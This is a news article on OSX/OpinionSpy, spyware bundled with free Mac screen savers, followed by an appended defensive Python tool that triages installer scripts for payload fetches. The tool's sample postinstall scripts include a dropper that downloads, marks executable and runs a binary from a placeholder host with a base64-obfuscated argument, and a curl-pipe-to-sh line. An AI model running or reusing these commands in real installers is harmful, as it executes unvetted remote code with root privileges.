
Malware discovered in freely distributed Mac applications

Robert Westervelt

Researchers at antivirus vendor Intego are warning about a new piece of malware being distributed primarily in freely available screen saver programs. The spyware application, dubbed OSX/OpinionSpy, can scan files, record user activity and send stolen data to remote servers.

Austin, Texas-based Intego specializes in security software for Apple Macintosh computers. The malware is not new; previous versions have been detected on Windows machines. It is bundled with some applications as a "market research" tool, but Intego said its behavior classifies it as a serious security threat.

The applications containing the spyware are freely available from popular download sites including MacUpdate, VersionTracker and Softpedia. A victim would not notice the malware being downloaded, and once on the machine the spyware is difficult to detect.

"The information provided with some of these applications contains a misleading text that users must accept explaining that a 'market research' program is installed with them, but not all of these specify this. Some of these programs are also distributed directly from developers' websites with no such warning," Intego said in an alert issued on the company blog.

Security experts have long pointed out the misconception that Macintosh and Linux-based machines are inherently more secure than Windows PCs. Windows machines are targeted more often because of their much larger market share, but Mac OS X, which is built on a UNIX (BSD-derived) foundation, and Linux-based operating systems also contain vulnerabilities that can be exploited to steal sensitive data and perform other malicious tasks.

Apple has responded by adding limited malware detection, though not a full-fledged antivirus product, to Mac OS X Snow Leopard. The company has also added other security features, such as sandboxing, to isolate some applications from the rest of the operating system. In addition to Intego, many security vendors, including Symantec and McAfee, sell Mac versions of their antivirus programs.

The OSX/OpinionSpy spyware opens a backdoor through which it contacts remote servers and uploads data. The same channel lets those behind the malware push updates with new features, with no user intervention.

Intego said it is unclear exactly what data the spyware copies and sends to those servers. It sniffs local network packets, potentially collecting data in transit, and scans local and network volumes, where it could harvest user names, passwords, credit card numbers and other sensitive data. The malware also injects code into the user's web browsers and into Apple's iChat application, behavior more typical of a virus.

"This malware 'infects' applications when they are running to be able to carry out its operations. (It infects the applications' code in the Mac's memory, and does not infect the actual applications' files on the user's hard disk.)" Intego said.

The antivirus vendor said it has also detected a second Mac-based spyware program believed to be a variant of OSX/OpinionSpy.

Security expert and SANS Institute instructor Rob VandenBrink, writing in the SANS Internet Storm Center diary, said the malware is a simple bolt-on that can easily be added to other freely downloadable applications. He described it as a small Java/PHP application named mac_flv_to_mp3.php.

"The neat thing about this malware is that it passes most static scan tests - the downloaded software itself is clean, the malware is downloaded as part of the installation process," VandenBrink wrote. "This highlights the requirement for an on-access virus scanner for your OSX computers."
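The install-time download VandenBrink describes is precisely what a hash or signature scan of the downloaded package misses: the package payload is clean, and the malicious code arrives while the installer's own pre/postinstall scripts are running (on macOS these run with root privileges for a .pkg). One practical check a practitioner can add before allowing a package to install is to triage those scripts for network fetches that are then executed. The Python below is an added example written for this article, not code from Intego, SANS or VandenBrink; the three postinstall scripts embedded in it are constructed samples rather than the real OpinionSpy installer, and the host names in them are placeholders on the reserved .invalid domain.

```python
"""Static triage of macOS installer scripts for install-time payload fetches.

Added example. A .pkg whose payload files are clean can still pull malware
while it installs, because its preinstall/postinstall scripts run as root and
may fetch and execute anything. File-hash or signature scans of the package
never see that second-stage payload; the scripts, however, are on disk and can
be inspected before the package is allowed to run.
"""
import re
from typing import Dict, List

# Command-line tools that pull content from the network.
FETCH_RE = re.compile(r"\b(curl|wget|nscurl)\b")
# Fetched bytes run without ever being saved as a file: "curl ... | sh",
# eval "$(curl ...)", source <(curl ...).
INLINE_EXEC_RE = re.compile(
    r"\|\s*(sudo\s+)?(sh|bash|zsh|python[0-9.]*|perl|ruby|php|osascript)\b"
    r"|\beval\b|\bsource\b")
# Output path given to the fetch tool: curl -o FILE, wget -O FILE, --output FILE.
OUTFILE_RE = re.compile(r"(?:-o|-O|--output)\s+(\S+)")
# Verbs that turn a file into running code.
EXEC_VERB_RE = re.compile(
    r"\b(chmod\s+\+?x|sh|bash|zsh|python[0-9.]*|perl|ruby|php|osascript"
    r"|open|installer|launchctl)\b")
# Decoding steps that hide what is being fetched or run.
OBFUSCATION_RE = re.compile(
    r"\bbase64\b[^|\n]*(-d|-D|--decode)|\bopenssl\s+enc\b[^\n]*\s-d\b|\bxxd\s+-r\b")
URL_RE = re.compile(r"https?://[^\s'\"]+")


def triage_install_script(name: str, text: str) -> List[Dict]:
    """Return one finding per suspicious line of a pre/postinstall script.

    Each finding is a dict with script, line, severity ("high"/"medium"),
    reason and any URLs seen on the line. Lines are read after stripping
    shell comments, so a '#' inside a quoted string is treated as a comment
    start; good enough for triage, not a shell parser.
    """
    findings: List[Dict] = []
    fetched: Dict[str, int] = {}  # path written by a fetch -> line number

    def add(lineno: int, severity: str, reason: str, urls: List[str]) -> None:
        findings.append({"script": name, "line": lineno, "severity": severity,
                         "reason": reason, "urls": urls})

    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if FETCH_RE.search(line):
            urls = URL_RE.findall(line)
            if INLINE_EXEC_RE.search(line):
                add(lineno, "high", "fetched content executed in place", urls)
            else:
                m = OUTFILE_RE.search(line)
                if m:
                    fetched[m.group(1)] = lineno
                add(lineno, "medium", "install-time network fetch", urls)
        else:
            # A file written by an earlier fetch that is now made executable,
            # handed to an interpreter, or invoked directly.
            for path, fetch_line in fetched.items():
                if path in line and (line.startswith(path) or EXEC_VERB_RE.search(line)):
                    add(lineno, "high", f"file fetched on line {fetch_line} is executed", [])
                    break
        if OBFUSCATION_RE.search(line):
            add(lineno, "medium", "decoded or obfuscated command", [])
    return findings


def package_verdict(findings: List[Dict]) -> str:
    """Collapse findings to the worst severity seen: high, medium or clean."""
    severities = {f["severity"] for f in findings}
    if "high" in severities:
        return "high"
    if "medium" in severities:
        return "medium"
    return "clean"


# Constructed sample scripts (not the real OpinionSpy installer); host names
# use the reserved .invalid TLD so nothing here resolves.
BENIGN_POSTINSTALL = """#!/bin/sh
# fix ownership of the installed bundle and register its launch agent
chown -R root:wheel "$2/FLV2MP3.app"
chmod -R 755 "$2/FLV2MP3.app"
launchctl load "$2/Library/LaunchAgents/com.example.flv2mp3.plist"
exit 0
"""

DROPPER_POSTINSTALL = """#!/bin/sh
# postinstall: the package contents are clean; the payload arrives here
INSTALL_DIR="$2"
chmod -R 755 "$INSTALL_DIR/FLV2MP3.app"
curl -s -o /tmp/.survey "http://updates.example.invalid/mr/installer.bin"
chmod +x /tmp/.survey
/tmp/.survey --silent --server "$(echo aHR0cDovL3VwZGF0ZXMuZXhhbXBsZS5pbnZhbGlkLw== | base64 -D)"
"""

PIPE_POSTINSTALL = """#!/bin/bash
curl -fsSL http://cdn.example.invalid/bootstrap.sh | sh
"""

if __name__ == "__main__":
    for script_name, body in [("benign", BENIGN_POSTINSTALL),
                              ("dropper", DROPPER_POSTINSTALL),
                              ("pipe", PIPE_POSTINSTALL)]:
        results = triage_install_script(script_name, body)
        print(f"{script_name}: {package_verdict(results)}")
        for f in results:
            print(f"  line {f['line']:>2} [{f['severity']}] {f['reason']} {f['urls']}")
```

On a real package, expand it without installing (`pkgutil --expand foo.pkg outdir`) and feed each file under the resulting `Scripts` directory to `triage_install_script`. A "medium" fetch with no URL (the address is built at run time) deserves the same attention as a "high"; the check is a triage aid for deciding what to detonate or block, not a replacement for the on-access scanner VandenBrink calls for, since a payload fetched by a legitimate-looking updater binary rather than by the install script itself will not appear here.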